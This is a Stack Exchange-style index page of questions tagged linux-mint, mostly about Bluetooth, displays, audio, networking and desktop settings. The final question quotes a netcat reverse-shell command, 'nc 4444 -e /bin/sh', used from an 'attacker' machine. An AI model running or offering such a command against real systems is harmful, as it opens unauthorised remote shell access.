Questions tagged [linux-mint]

Linux Mint is a Linux distribution based on Ubuntu aiming to be more usable out-of-the-box

Filter by
Sorted by
Tagged with
202 votes
2 answers

Bluetooth Pairing on Dual Boot of Windows & Linux Mint/Ubuntu - Stop having to Pair Devices

When dual booting Windows 7/10 and Linux Mint/Ubuntu, you may find yourself having to re-pair your Bluetooth devices again and again. This will happen every time you switch OS. Now, how do you ...
Mario Olivio Flores's user avatar
113 votes
8 answers

Set volume from terminal

Is it possible to set the audio volume using the terminal instead of clicking the speaker icon in the top bar? The reason I want to do this is that my keyboard does not have volume increase/decrease ...
Tristian's user avatar
  • 1,509
93 votes
8 answers

Connect to a Bluetooth device via Terminal

I'm using Mint 15 w/ Cinnamon. I bought a set of bluetooth speakers and I'm trying to connect to them via terminal. Via the GUI I can see them normally and I am connected to them. I want to make a ...
Zippie's user avatar
  • 1,849
89 votes
5 answers

Xfce entered zoom mode. How do I exit?

I pressed something around my mouse pad (keys in the altgr region+mousepad - quite possibly multitouch) and suddenly the whole X11 display zoomed around 10%. That means I can see 90% of the 1920x1080 ...
Ole Tange's user avatar
  • 34.8k
64 votes
4 answers

Execute a command before shutdown

I want to execute a simple command just before the computer shuts down (timing is not essential). For startup, I can use /etc/rc.local; is there something similar for shutdown? Note that I would ...
c0dehunter's user avatar
59 votes
5 answers

Debugging high (near total) CPU/memory usage of "Web Content" application on Linux Mint

I have Linux Mint installed on 3 computers at home, and all of them are almost unusably slow whenever Firefox is open. Here is the output from top: As you can see, "Web Content" and Firefox are ...
J. Taylor's user avatar
  • 2,685
55 votes
6 answers

How to set password for pdf files?

I need to password protect my PDF file(s), because I am going to send them through email and I want anyone who would view my PDF file(s) to be prompted for a password. How can I add a password to a ...
David's user avatar
  • 711
55 votes
18 answers

How do I transfer files between Android and Linux over USB?

I want to copy some movie files from Linux to my HTC One SV Android phone (not rooted). In Windows, my phone mount its internal and SD-card volumes automatically when I plug it in, allowing me to ...
lamwaiman1988's user avatar
52 votes
11 answers

Adding the Cinnamon panel to the second monitor

I have set up two monitors in my system. One is powered by the HDMI port and the other one is powered by the normal analogue port of the same GPU (Nvidia Ge-force 210). I just setup twin display in ...
THpubs's user avatar
  • 1,015
51 votes
3 answers

Convert Amazon .pem key to Putty .ppk key Linux

I have generated and downloaded a private .pem key from AWS. However, to use Putty in order to connect to the virtual machine, I must have that key in .ppk format. The process of conversion is ...
Flame_Phoenix's user avatar
49 votes
13 answers

How can I get an alert when my battery is about to die in Linux Mint?

This happens to me more than I'd like to admit, but sometimes I don't notice the power getting low since it only shows up in my status bar, then the computer just quits. I'd like a big alert that ...
Travis Reeder's user avatar
41 votes
2 answers

What exactly is MOK in Linux for?

Upon installing Nvidia drivers I was promoted to set up a MOK password or third party drivers may not work properly, so I created one. After reboot I was presented with a blue MOK management screen ...
VernonB's user avatar
  • 523
40 votes
2 answers

Which version of Ubuntu is my Linux Mint installation based on?

For any given version or installation of Linux Mint, how would I find out which version of Ubuntu it is based on? I'm sure it must be in documentation somewhere right?
still_dreaming_1's user avatar
39 votes
11 answers

When trying to change username, terminal tells me user is currently used by process

I am trying to change my username, as per advice here however after running the following command: CurrentName@HostName ~ $ sudo usermod -l TheNameIWantToChange -d /home/TheNameIWantToChange -m ...
Paradox's user avatar
  • 732
36 votes
2 answers

Where is the Cinnamon LookingGlass log?

I run Linux Mint 17.1. When I log in I get a Cinnamon notification saying: Problems during Cinnamon startup Cinnamon started successfully, but one or more applets, desklets or extension failed to ...
jacwah's user avatar
  • 537
36 votes
4 answers

Separate workspaces on each monitor

I recently switched to a new PC at work, one with two (identical, Dell 23") monitors. I'm running Linux Mint 15 64bit / Cinnamon. Is there a way to set it up in such a way that, instead of both ...
Swooper's user avatar
  • 361
29 votes
1 answer

How to view RAM's SPD / timings table?

In Linux Mint, how to get the same information presented in the lower half of the below picture? Output by CPU-Z in Windows: What I've tried: Running CPU-Z 1.66 in Wine as Windows 95, 98 and XP. CPU-...
gom's user avatar
  • 391
27 votes
2 answers

Difference between auto mode and manual mode in update-alternatives

When I run $ update-alternatives --config java I get a few rows: What is the difference between auto mode and manual mode?
baudo2048's user avatar
  • 373
25 votes
4 answers

How to force release of a keyboard modifiers

Sometimes, when I use synergy between my machines when one is using full-screen VirtualBox guest I get stuck with some weird key modifiers turned on. If they exist on my keyboard (like Shift_L) I can ...
Adam Ryczkowski's user avatar
24 votes
1 answer

Cannot type file paths on any Open File Dialogs?

There is no way I can type/paste a file path when I use some Open File dialog: There is not right click option or anything. I use linux Mint XFCE 19.1: linux@linux:~$ uname -a Linux linux 4.15.0-20-...
user's user avatar
  • 771
23 votes
3 answers

partitioning using 2 hard disks (SSD and non-SSD) in linux [closed]

I have the following free spaces on 2 disks: SSD - 240G (sda) non-SSD - 240G (sdb) I understand that I should use SSD to install packages and non-SSD just for storing data. What's the best ...
Askar's user avatar
  • 1,078
22 votes
2 answers

sudo: password prompted even when NOPASSWD is set [duplicate]

~/bin$ cat setbrightness id echo $1 > /sys/class/backlight/intel_backlight/brightness ~/bin$ whoami rag ~/bin$ sudo -l Matching Defaults entries for rag on this host: env_reset, mail_badpass,...
rag's user avatar
  • 1,256
22 votes
1 answer

Mint 16 Cinnamon, maximize window fully

I am using Linux Mint 16 Petra cinnamon. The problem I have is that when I drag a window to the top edge of the screen the window only maximizes to the top half of the screen instead of the the entire ...
Vader's user avatar
  • 373
22 votes
2 answers

What's the "right way" to effect changes in /etc/resolv.conf with /etc/resolv.conf.d in place?

I the old days, resolv.conf was static and you edited it yourself. Later on, the DHCP client would rewrite it, using some static entries and what it got from the DHCP lease. These days, some ...
einpoklum's user avatar
  • 9,217
20 votes
3 answers

Chrome window gets too big when maximizing on linux mint xfce

I have following problem. I am new to Linux and went with Mint as my distro. On windows I always used Chrome as my go to browser because I do a lot of webdev and like to have the best support for ...
Savo Vuksan's user avatar
20 votes
1 answer

Using Gparted and installing Windows 10 after Linux

I recently built a computer and put LinuxMint 17.3 on it right away. I now have a free copy of Windows 10. I haven't really been able to find detailed instructions on how to install Windows while ...
anthony's user avatar
  • 301
20 votes
2 answers

Can't start applications due to "Maximum number of clients reached" error

After some period of time, I'm experiencing problems with starting applications, for example, Viber. $ /opt/viber/Viber QSqlDatabasePrivate::removeDatabase: connection 'ConfigureDBConnection' is ...
humkins's user avatar
  • 1,147
19 votes
5 answers

Linux Mint - Gnome Shell with dual monitor switch main screen

I have a Lenovo Thinkpad T420 with Linux Mint 12 and gnome-shell on it. Its a Intel HD 3000 Graphics card in there. When I'm at home, I have another Screen plugged in (19" 4:3) and everything works ...
Jan Schmidt's user avatar
19 votes
3 answers

Turn on NumLock on startup in Linux Mint in the Login window

Situation: When I turn on my Linux Mint 20/19/18/17 Cinnamon the NumLock is Off in the Login window. Objective: Turn on NumLock automatically at startup in the Login window.
Vlastimil Burián's user avatar
19 votes
6 answers

Different time in Windows and Linux Mint

I have installed Linux Mint first on my Acer Aspire 4930 and then dual-booted with Windows 7. I always see the correct time on Linux Mint but on booting into Windows the time is shifted back by a few ...
Ballistic's user avatar
  • 437
19 votes
4 answers

Can't access Eduroam wireless internet connection SETTINGS (Linux Mint 17)

Using Linux Mint (Cinnamon Desktop) I have not been able to connect to the eduroam wireless university network. The reason is that I can't find a proper way to enter the respective network settings, i....
Lena's user avatar
  • 191
19 votes
2 answers

mount: No such file or directory with encrypted recovery

I have destroyed my Mint Linux installation. I just wanted access to my remote storefront. So what happened was I was having trouble with ICEauthority file in my home directory. So following ...
Frankenmint's user avatar
18 votes
8 answers

Map Caps Lock to Control in Linux Mint

I am running the latest version of Linux Mint with Cinnamon. I'm trying to map Caps Lock to Ctrl, but I cannot figure out how to do it. All web searches I've done have led me to older versions of ...
Zach Russell's user avatar
  • 1,037
18 votes
3 answers

Why won't Linux let me play with /dev/dsp?

I'm working through a Linux textbook, and it's telling me about devices. It says that if I send the appropriate output to /dev/dsp, then it will play a sound. The example is cat file.wav > /dev/...
Korgan Rivera's user avatar
18 votes
7 answers

How to move taskbar to different monitor on Linux Mint?

I am using dual monitors on Linux Mint and I can't figure out how to get the bottom taskbar to appear on my left side monitor. Right now it only appears on the right monitor. How can I move it to the ...
Kyle's user avatar
  • 183
18 votes
2 answers

Linux Mint Cinnamon 18 - In what file are the keyboard shortcuts saved?

In what file are the keyboard shortcuts saved in Linux Mint Cinnamon 18 ? I want to backup the shortcuts so if I know the file where the shortcuts are saved, I can simply create a symlink to the ...
Lucien Chardon's user avatar
18 votes
8 answers

how to disable auto login in linux mint

I'm using linux mint with Cinnamon. The login screen comes to type a username but it also displays that in 10 seconds userx will be automatically logged in. And it happens. How to make it wait ...
John Eipe's user avatar
  • 673
18 votes
1 answer

How to disable dnsmasq?

From time to time when I'm switching from eth0 to wlan0 (or vice versa) interface domain name resolving breaks and /etc/resolv.conf contains nameserver I commented #dns=dnsmasq in /etc/...
humkins's user avatar
  • 1,147
17 votes
6 answers

Change desktop wallpaper from terminal

I am running Mint 13 with Cinnamon 1.6. I would like my desktop wallpaper to automatically change depending on the time of day. So, the first thing that comes to mind is setting up a cron job to do it ...
aggregate1166877's user avatar
17 votes
8 answers

Linux mouse freezes after suspend

Today I finally decided to switch from Windows to Ubuntu. I fully install Ubuntu, but everytime my notebook goes in sleepmode and wakes up my mouse will not work anymore. When I do a reboot it works ...
jowijowi's user avatar
  • 171
17 votes
7 answers

Unable to perform file operations on a MTP device mounted via GVFS: "Operation not supported"

I am running Linux Mint 17.1 64-bit (based on Ubuntu 14.04). Ever since upgrading from Linux Mint 14/Ubuntu 12.10, the Python script I use to sync music to my Walkman has stopped working. Previously, ...
David Pitchford's user avatar
17 votes
2 answers

How to update expired Skype signing key

Yesterday, I received signature expired: Err:24 stable InRelease The following signatures were invalid: EXPKEYSIG 1F3045A5DF7587C3 Skype Linux ...
Vlastimil Burián's user avatar
17 votes
5 answers

Shortcut to minimize all windows?

In Windows systems, I use the keyboard shortcut Start-D (show desktop) a lot. I'm using Linux Mint, and I wonder: Can I create a keyboard shortcut that will do the same? edit after the comment from ...
elyashiv's user avatar
  • 757
17 votes
3 answers

How do I get Ctrl + Alt + t to launch ther terminal in Linux Mint 13 MATE?

Pressing Ctrl + Alt + t seems to do nothing on my Linux Mint 13 MATE. How can I set this shortcut to launch a terminal window? As a detail, it seems the terminal is mate-terminal rather than gnome-...
eoinoc's user avatar
  • 1,861
17 votes
1 answer

Rebooting without shutting off?

I have been using Linux Mint Debian with Debian unstable and noticed that when I press restart, instead of going all the way back to the BIOS, then grub, then booting up, I seem to be shutting down ...
Seth Hikari's user avatar
17 votes
4 answers

Is there a linux equivalent to Mac's "Shake to Find Cursor"?

My coworker has a Mac, and when he loses his mouse cursor, he wiggles the mouse, and the mouse pointer gets bigger and bigger to visually show its location. Is there anything like that in Linux? I ...
Stephen S's user avatar
  • 794
16 votes
7 answers

What's eating my disk space?

I'm running Linux Mint 14 Nadia. The Linux partition has 10G. When the system starts, du reports 80% usage. Then the usage slowly grows until it reaches 100% and the system becomes unusable. (It ...
Arry's user avatar
  • 269
16 votes
2 answers

Chromecast not detectable from chromium

I'm using mint 18 and chromium 55. I have chromecast set up and connected to the network. I can connect to it from my Android device but the chromium browser can't find it. I tried resetting the ...
Tom Klino's user avatar
  • 842
16 votes
2 answers

How to enable snaps support on Linux Mint 20?

In Linux Mint 20, if I want to enable snap support to install snap packages, the usual command sudo apt install snapd to install snapd does not work. As you can see in the picture below, if I run ...
sarru1291's user avatar
  • 513
16 votes
3 answers

invalid option -e in netcat

I am trying to get a shell on host machine from another (attacker) machine. Attacker machine is listening. I am running below command on my host machine nc 4444 -e /bin/sh Output I ...
Tarandeepsingh's user avatar

2 3 4 5